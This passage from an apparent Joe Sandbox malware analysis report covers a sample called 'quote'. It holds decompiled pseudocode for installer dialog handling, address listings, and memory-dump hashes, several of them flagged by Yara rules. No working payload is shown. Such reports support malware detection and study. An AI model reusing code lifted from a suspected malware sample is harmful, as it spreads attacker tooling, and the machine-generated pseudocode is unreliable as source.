                                                                                      					_t277 = 0;
                                                                                      					do {
                                                                                      						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                      						_t277 = _t277 + 4;
                                                                                      						_t235 = _t235 - 1;
                                                                                      						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                      					} while (_t235 != 0);
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				 *_a24 =  *_a24 & 0x00000000;
                                                                                      				 *_a28 =  *_a28 & 0x00000000;
                                                                                      				return 0;
                                                                                      			}











































































                                                                                      0x00407463
                                                                                      0x0040746b
                                                                                      0x0040746f
                                                                                      0x00407471
                                                                                      0x00407474
                                                                                      0x00407476
                                                                                      0x00407476
                                                                                      0x00407478
                                                                                      0x0040747f
                                                                                      0x00407481
                                                                                      0x00407481
                                                                                      0x00407487
                                                                                      0x0040749c
                                                                                      0x004074a4
                                                                                      0x004074a6
                                                                                      0x004074a8
                                                                                      0x004074ab
                                                                                      0x004074ac
                                                                                      0x004074ac
                                                                                      0x004074b2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004074b4
                                                                                      0x004074b7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004074b7
                                                                                      0x004074bb
                                                                                      0x004074be
                                                                                      0x004074c0
                                                                                      0x004074c0
                                                                                      0x004074c3
                                                                                      0x004074c9
                                                                                      0x004074ca
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004074ca
                                                                                      0x004074cf
                                                                                      0x004074d2
                                                                                      0x004074d4
                                                                                      0x004074d4
                                                                                      0x004074da
                                                                                      0x004074dc
                                                                                      0x004074ed
                                                                                      0x004074e0
                                                                                      0x004074e4
                                                                                      0x00407789
                                                                                      0x00000000
                                                                                      0x00407789
                                                                                      0x004074ea
                                                                                      0x004074eb
                                                                                      0x004074eb
                                                                                      0x004074f3
                                                                                      0x004074f6
                                                                                      0x004074fa
                                                                                      0x004074fc
                                                                                      0x004074fe
                                                                                      0x00407501
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407509
                                                                                      0x0040750f
                                                                                      0x00407511
                                                                                      0x00407513
                                                                                      0x00407514
                                                                                      0x00407529
                                                                                      0x00407529
                                                                                      0x0040752c
                                                                                      0x0040752e
                                                                                      0x0040752e
                                                                                      0x00407530
                                                                                      0x00407535
                                                                                      0x00407537
                                                                                      0x0040753e
                                                                                      0x00407540
                                                                                      0x00407548
                                                                                      0x00407548
                                                                                      0x0040754a
                                                                                      0x0040754b
                                                                                      0x0040755a
                                                                                      0x0040755e
                                                                                      0x00407562
                                                                                      0x00407565
                                                                                      0x00407568
                                                                                      0x0040756d
                                                                                      0x00407570
                                                                                      0x00407576
                                                                                      0x0040757d
                                                                                      0x00407583
                                                                                      0x0040777c
                                                                                      0x0040777c
                                                                                      0x00407781
                                                                                      0x00407790
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407781
                                                                                      0x00407590
                                                                                      0x00407593
                                                                                      0x00407596
                                                                                      0x00407599
                                                                                      0x0040759d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075a8
                                                                                      0x004075ab
                                                                                      0x004075ac
                                                                                      0x004075ae
                                                                                      0x004075b4
                                                                                      0x004075b7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x004075be
                                                                                      0x004075c1
                                                                                      0x004075c4
                                                                                      0x004075c7
                                                                                      0x004075cd
                                                                                      0x004075cf
                                                                                      0x004075cf
                                                                                      0x004075d7
                                                                                      0x004075db
                                                                                      0x004075e0
                                                                                      0x00407605
                                                                                      0x0040760b
                                                                                      0x0040760d
                                                                                      0x0040760f
                                                                                      0x00407612
                                                                                      0x0040761b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075e2
                                                                                      0x004075e2
                                                                                      0x004075eb
                                                                                      0x004075ef
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407600
                                                                                      0x00407600
                                                                                      0x00407603
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075f3
                                                                                      0x004075f6
                                                                                      0x004075f8
                                                                                      0x004075fc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075fe
                                                                                      0x004075fe
                                                                                      0x00000000
                                                                                      0x00407600
                                                                                      0x00407624
                                                                                      0x0040762a
                                                                                      0x00407634
                                                                                      0x00407636
                                                                                      0x0040763b
                                                                                      0x0040763d
                                                                                      0x00407673
                                                                                      0x0040763f
                                                                                      0x0040763f
                                                                                      0x00407642
                                                                                      0x00407645
                                                                                      0x0040764f
                                                                                      0x00407652
                                                                                      0x00407659
                                                                                      0x00407664
                                                                                      0x0040766b
                                                                                      0x0040766b
                                                                                      0x00407675
                                                                                      0x00407678
                                                                                      0x0040767a
                                                                                      0x00407680
                                                                                      0x00407680
                                                                                      0x00407689
                                                                                      0x0040768c
                                                                                      0x00407691
                                                                                      0x004076a0
                                                                                      0x004076a8
                                                                                      0x004076ad
                                                                                      0x004076d1
                                                                                      0x004076d9
                                                                                      0x004076dd
                                                                                      0x004076e3
                                                                                      0x004076af
                                                                                      0x004076bd
                                                                                      0x004076c0
                                                                                      0x004076c6
                                                                                      0x004076c6
                                                                                      0x004076e7
                                                                                      0x004076a2
                                                                                      0x004076a2
                                                                                      0x004076a2
                                                                                      0x004076f8
                                                                                      0x004076fc
                                                                                      0x00407708
                                                                                      0x00407703
                                                                                      0x00407706
                                                                                      0x00407706
                                                                                      0x00407710
                                                                                      0x00407715
                                                                                      0x0040771d
                                                                                      0x00407719
                                                                                      0x0040771b
                                                                                      0x0040771b
                                                                                      0x00407723
                                                                                      0x00407725
                                                                                      0x0040772c
                                                                                      0x00407736
                                                                                      0x00407740
                                                                                      0x0040775c
                                                                                      0x00407760
                                                                                      0x004075a5
                                                                                      0x004075ab
                                                                                      0x004075ac
                                                                                      0x004075ae
                                                                                      0x004075b4
                                                                                      0x004075b7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004075b7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407742
                                                                                      0x00407742
                                                                                      0x00407742
                                                                                      0x00407747
                                                                                      0x00407750
                                                                                      0x00407759
                                                                                      0x00000000
                                                                                      0x00407759
                                                                                      0x00407766
                                                                                      0x00407766
                                                                                      0x00407769
                                                                                      0x00407770
                                                                                      0x00407773
                                                                                      0x00000000
                                                                                      0x00407596
                                                                                      0x00407516
                                                                                      0x00407518
                                                                                      0x00407518
                                                                                      0x0040751c
                                                                                      0x0040751f
                                                                                      0x00407520
                                                                                      0x00407520
                                                                                      0x00000000
                                                                                      0x00407518
                                                                                      0x0040748c
                                                                                      0x00407492
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                      • Instruction ID: 4c948e8094d30857df7bb037d19ad889c7f26ef399dade94ff28b4422ea0219f
                                                                                      • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                      • Instruction Fuzzy Hash: A4C15931E042199BCF14CF68D8905EEBBB2BF88354F25866AD85677380D738B942CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f5bdb218eb4a47a85b79a0f54fceffc52c660ed6bfee6b642bd9983904aba0d5
                                                                                      • Instruction ID: 9f1bf5fddfa198e9fbe0d4ea28dd9d7668288ba249700a5fab5ff5b6904bb7bd
                                                                                      • Opcode Fuzzy Hash: f5bdb218eb4a47a85b79a0f54fceffc52c660ed6bfee6b642bd9983904aba0d5
                                                                                      • Instruction Fuzzy Hash: 72510F71A04389DFCF309F29CD947DABBBAAF99340F46402EDD899B252D3304A46CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b478efffc1063e65120d622c92a44fe29d471332004595a1b2a63d07c7ec7f3
                                                                                      • Instruction ID: a6927e9a0024e96e9f7f1edeadfb371f68f35f68a716abbedaf4fd537e6f51f2
                                                                                      • Opcode Fuzzy Hash: 1b478efffc1063e65120d622c92a44fe29d471332004595a1b2a63d07c7ec7f3
                                                                                      • Instruction Fuzzy Hash: 405135B1A003049FDB249F29C9D8BDA77F5BF053A4F528269DC858B261D3349A85CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82efb2fdfb173021ded0b7edb7ad3cf484a6c5f3876a755a3331dc8130314b35
                                                                                      • Instruction ID: 2bf926935035be4efc21952221d9c2302c92897aaccee4453bad287840269ce5
                                                                                      • Opcode Fuzzy Hash: 82efb2fdfb173021ded0b7edb7ad3cf484a6c5f3876a755a3331dc8130314b35
                                                                                      • Instruction Fuzzy Hash: AD5124713443498FEB34CE298DE47EA77E2EF56310F85863ADC4ADB651D3748A85CA01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e202524ad73656cef8cefe07f81bb03d0f91301636f11eb7c4be35dd4454fc29
                                                                                      • Instruction ID: 626ca06a6149fe1a91495bd9e2392401e0a6d700089016866dc671f0db82e212
                                                                                      • Opcode Fuzzy Hash: e202524ad73656cef8cefe07f81bb03d0f91301636f11eb7c4be35dd4454fc29
                                                                                      • Instruction Fuzzy Hash: 79513631A44308CFDB319F28CA947D973B6EF56350F45412ECC99DB255E3789A86CB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 341bdbb48bfbef7bb76d3312ca8024752be1789c9131fe7d625754205fdf186f
                                                                                      • Instruction ID: c1d5b7177106069680a65bb77aadf3b970438b2e2423240f67c6e1bc7c2283b6
                                                                                      • Opcode Fuzzy Hash: 341bdbb48bfbef7bb76d3312ca8024752be1789c9131fe7d625754205fdf186f
                                                                                      • Instruction Fuzzy Hash: 5B5136711027889FDB30DE168CE57E777E3AF8A718F54822FC94A4B252C3386682CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1568ce52f6e2bfe6e7efad8b0ba308baf53ac9b690d35adf67a1134c722319d6
                                                                                      • Instruction ID: 433ee44d4ad987e122515a51297656764768efa73979aa99c727e5f5ddb52122
                                                                                      • Opcode Fuzzy Hash: 1568ce52f6e2bfe6e7efad8b0ba308baf53ac9b690d35adf67a1134c722319d6
                                                                                      • Instruction Fuzzy Hash: 62417A79A447478FDF31DD2889D4BE637B2AF92794F59426ECD85AB314C7318842CA01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 087b541acec362af540b6944acde81f63be211c731f13154d097228555035fab
                                                                                      • Instruction ID: 3ae1f49ba4deed1b29df87701b22ff5577646c46c26ccbcea7b4024a458ed8ac
                                                                                      • Opcode Fuzzy Hash: 087b541acec362af540b6944acde81f63be211c731f13154d097228555035fab
                                                                                      • Instruction Fuzzy Hash: BE31E4329082098BDB10AE20CB44BDFB3BBEF90B50F15451CC8E597549E338669B9F1A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 57166095abdd8dd4dc9d7d121cc6df3d085c9825692aecad561b01f00b34ec7f
                                                                                      • Instruction ID: 34c5a2a707942a5862e6bb99894b38d95a59738e2479d7515bc4dbdfc3866e51
                                                                                      • Opcode Fuzzy Hash: 57166095abdd8dd4dc9d7d121cc6df3d085c9825692aecad561b01f00b34ec7f
                                                                                      • Instruction Fuzzy Hash: E221C1392047478BDF20DE7988D57E763A2FF59354F49812DDD8ADBA01E7308841C602
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8eab56536653705ee5689a511365292219b54fd7ccab4b3f692d1bbc366eb71d
                                                                                      • Instruction ID: 1bc83d69ed28759beee22b6b171dc54c0e11f80d9e30ba2eb01936195754aafd
                                                                                      • Opcode Fuzzy Hash: 8eab56536653705ee5689a511365292219b54fd7ccab4b3f692d1bbc366eb71d
                                                                                      • Instruction Fuzzy Hash: 6B21D131445708CFDB31AF14CA98BD933B2FF42320F55926ACC6A9B551E3382A86DB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99a69297526eaa6eb99d2880f7d2eabf3c52bd7cb4a481439df075c58c24080e
                                                                                      • Instruction ID: 6630a4543dab681ac1ed951f469dc8c989be6002ea30dea85a68391346c63f1a
                                                                                      • Opcode Fuzzy Hash: 99a69297526eaa6eb99d2880f7d2eabf3c52bd7cb4a481439df075c58c24080e
                                                                                      • Instruction Fuzzy Hash: ADB002792516448FC695CA19C190E8577B5BB45690F915490E4118BA15C268E954C911
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 96%
                                                                                      			E00404DD4(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				struct HWND__* _v12;
                                                                                      				long _v16;
                                                                                      				signed int _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				signed char* _v28;
                                                                                      				int _v32;
                                                                                      				void* _v36;
                                                                                      				signed int _v44;
                                                                                      				int _v48;
                                                                                      				signed int* _v60;
                                                                                      				signed char* _v64;
                                                                                      				signed int _v68;
                                                                                      				long _v72;
                                                                                      				void* _v76;
                                                                                      				intOrPtr _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				void* _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t191;
                                                                                      				signed int _t203;
                                                                                      				void* _t206;
                                                                                      				intOrPtr _t207;
                                                                                      				long _t212;
                                                                                      				signed int _t216;
                                                                                      				signed int _t227;
                                                                                      				void* _t230;
                                                                                      				void* _t231;
                                                                                      				int _t237;
                                                                                      				long _t242;
                                                                                      				long _t243;
                                                                                      				signed int _t244;
                                                                                      				signed int _t249;
                                                                                      				signed int _t251;
                                                                                      				signed char _t252;
                                                                                      				signed char _t260;
                                                                                      				void* _t265;
                                                                                      				void* _t267;
                                                                                      				signed char* _t285;
                                                                                      				signed char _t286;
                                                                                      				long _t291;
                                                                                      				void* _t298;
                                                                                      				signed int* _t299;
                                                                                      				int _t300;
                                                                                      				long _t301;
                                                                                      				int _t303;
                                                                                      				long _t304;
                                                                                      				int _t305;
                                                                                      				signed int _t306;
                                                                                      				signed int _t309;
                                                                                      				signed int _t316;
                                                                                      				signed char* _t324;
                                                                                      				int _t329;
                                                                                      				void* _t331;
                                                                                      
                                                                                      				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                      				_t191 = GetDlgItem(_a4, 0x408);
                                                                                      				_t298 =  *0x434f48;
                                                                                      				_t331 = SendMessageW;
                                                                                      				_v8 = _t191;
                                                                                      				_v36 = _t298;
                                                                                      				_v24 =  *0x434f14 + 0x94;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L23:
                                                                                      					if(_a8 != 0x405) {
                                                                                      						_t307 = _a16;
                                                                                      					} else {
                                                                                      						_a12 = 0;
                                                                                      						_t307 = 1;
                                                                                      						_a8 = 0x40f;
                                                                                      						_a16 = 1;
                                                                                      					}
                                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                      						_v16 = _t307;
                                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
                                                                                      							if(( *0x434f1d & 0x00000002) != 0) {
                                                                                      								L41:
                                                                                      								if(_v16 != 0) {
                                                                                      									_t242 = _v16;
                                                                                      									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
                                                                                      										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                      									}
                                                                                      									_t243 = _v16;
                                                                                      									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
                                                                                      										_t244 =  *(_t243 + 0x5c);
                                                                                      										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                      											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
                                                                                      										} else {
                                                                                      											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							if(_a8 == 0x413) {
                                                                                      								L33:
                                                                                      								_t307 = 0 | _a8 != 0x00000413;
                                                                                      								_t249 = E00404D22(_v8, _a8 != 0x413);
                                                                                      								_v20 = _t249;
                                                                                      								if(_t249 >= 0) {
                                                                                      									_t100 = _t298 + 8; // 0x8
                                                                                      									_t307 = _t249 * 0x818 + _t100;
                                                                                      									_t251 =  *_t307;
                                                                                      									if((_t251 & 0x00000010) == 0) {
                                                                                      										if((_t251 & 0x00000040) == 0) {
                                                                                      											_t252 = _t251 ^ 0x00000001;
                                                                                      										} else {
                                                                                      											_t260 = _t251 ^ 0x00000080;
                                                                                      											if(_t260 >= 0) {
                                                                                      												_t252 = _t260 & 0x000000fe;
                                                                                      											} else {
                                                                                      												_t252 = _t260 | 0x00000001;
                                                                                      											}
                                                                                      										}
                                                                                      										 *_t307 = _t252;
                                                                                      										E0040117D(_v20);
                                                                                      										_a8 = 0x40f;
                                                                                      										_a12 = _v20 + 1;
                                                                                      										_a16 =  !( *0x434f1c) >> 0x00000008 & 0x00000001;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							_t307 = _a16;
                                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							goto L33;
                                                                                      						} else {
                                                                                      							goto L48;
                                                                                      						}
                                                                                      					} else {
                                                                                      						L48:
                                                                                      						if(_a8 != 0x111) {
                                                                                      							L56:
                                                                                      							if(_a8 == 0x200) {
                                                                                      								SendMessageW(_v8, 0x200, 0, 0);
                                                                                      							}
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								_t230 =  *0x42d24c;
                                                                                      								if(_t230 != 0) {
                                                                                      									ImageList_Destroy(_t230);
                                                                                      								}
                                                                                      								_t231 =  *0x42d260;
                                                                                      								if(_t231 != 0) {
                                                                                      									GlobalFree(_t231);
                                                                                      								}
                                                                                      								 *0x42d24c = 0;
                                                                                      								 *0x42d260 = 0;
                                                                                      								 *0x434f80 = 0;
                                                                                      							}
                                                                                      							if(_a8 != 0x40f) {
                                                                                      								L90:
                                                                                      								if(_a8 == 0x420 && ( *0x434f1d & 0x00000001) != 0) {
                                                                                      									_t329 = (0 | _a16 == 0x00000020) << 3;
                                                                                      									ShowWindow(_v8, _t329);
                                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
                                                                                      								}
                                                                                      								goto L93;
                                                                                      							} else {
                                                                                      								E004011EF(_t307, 0, 0);
                                                                                      								_t203 = _a12;
                                                                                      								if(_t203 != 0) {
                                                                                      									if(_t203 != 0xffffffff) {
                                                                                      										_t203 = _t203 - 1;
                                                                                      									}
                                                                                      									_push(_t203);
                                                                                      									_push(8);
                                                                                      									E00404DA2();
                                                                                      								}
                                                                                      								if(_a16 == 0) {
                                                                                      									L75:
                                                                                      									E004011EF(_t307, 0, 0);
                                                                                      									_v36 =  *0x42d260;
                                                                                      									_t206 =  *0x434f48;
                                                                                      									_v64 = 0xf030;
                                                                                      									_v20 = 0;
                                                                                      									if( *0x434f4c <= 0) {
                                                                                      										L86:
                                                                                      										if( *0x434f0c == 4) {
                                                                                      											InvalidateRect(_v8, 0, 1);
                                                                                      										}
                                                                                      										_t207 =  *0x433edc; // 0x6c266a
                                                                                      										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                      											E00404CDD(0x3ff, 0xfffffffb, E00404CF5(5));
                                                                                      										}
                                                                                      										goto L90;
                                                                                      									}
                                                                                      									_t299 = _t206 + 8;
                                                                                      									do {
                                                                                      										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
                                                                                      										if(_t212 != 0) {
                                                                                      											_t309 =  *_t299;
                                                                                      											_v72 = _t212;
                                                                                      											_v76 = 8;
                                                                                      											if((_t309 & 0x00000001) != 0) {
                                                                                      												_v76 = 9;
                                                                                      												_v60 =  &(_t299[4]);
                                                                                      												_t299[0] = _t299[0] & 0x000000fe;
                                                                                      											}
                                                                                      											if((_t309 & 0x00000040) == 0) {
                                                                                      												_t216 = (_t309 & 0x00000001) + 1;
                                                                                      												if((_t309 & 0x00000010) != 0) {
                                                                                      													_t216 = _t216 + 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t216 = 3;
                                                                                      											}
                                                                                      											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
                                                                                      											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                      											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                      										}
                                                                                      										_v20 = _v20 + 1;
                                                                                      										_t299 =  &(_t299[0x206]);
                                                                                      									} while (_v20 <  *0x434f4c);
                                                                                      									goto L86;
                                                                                      								} else {
                                                                                      									_t300 = E004012E2( *0x42d260);
                                                                                      									E00401299(_t300);
                                                                                      									_t227 = 0;
                                                                                      									_t307 = 0;
                                                                                      									if(_t300 <= 0) {
                                                                                      										L74:
                                                                                      										SendMessageW(_v12, 0x14e, _t307, 0);
                                                                                      										_a16 = _t300;
                                                                                      										_a8 = 0x420;
                                                                                      										goto L75;
                                                                                      									} else {
                                                                                      										goto L71;
                                                                                      									}
                                                                                      									do {
                                                                                      										L71:
                                                                                      										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
                                                                                      											_t307 = _t307 + 1;
                                                                                      										}
                                                                                      										_t227 = _t227 + 1;
                                                                                      									} while (_t227 < _t300);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                      							goto L93;
                                                                                      						} else {
                                                                                      							_t237 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                      							if(_t237 == 0xffffffff) {
                                                                                      								goto L93;
                                                                                      							}
                                                                                      							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
                                                                                      							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
                                                                                      								_t301 = 0x20;
                                                                                      							}
                                                                                      							E00401299(_t301);
                                                                                      							SendMessageW(_a4, 0x420, 0, _t301);
                                                                                      							_a12 = _a12 | 0xffffffff;
                                                                                      							_a16 = 0;
                                                                                      							_a8 = 0x40f;
                                                                                      							goto L56;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					 *0x434f80 = _a4;
                                                                                      					_t303 = 2;
                                                                                      					_v32 = 0;
                                                                                      					_v20 = _t303;
                                                                                      					 *0x42d260 = GlobalAlloc(0x40,  *0x434f4c << 2);
                                                                                      					_t265 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                                      					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                                      					_v16 = _t265;
                                                                                      					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E004053ED);
                                                                                      					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                      					 *0x42d24c = _t267;
                                                                                      					ImageList_AddMasked(_t267, _v16, 0xff00ff);
                                                                                      					SendMessageW(_v8, 0x1109, _t303,  *0x42d24c);
                                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                      					}
                                                                                      					DeleteObject(_v16);
                                                                                      					_t304 = 0;
                                                                                      					do {
                                                                                      						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
                                                                                      						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
                                                                                      							if(_t304 != 0x20) {
                                                                                      								_v20 = 0;
                                                                                      							}
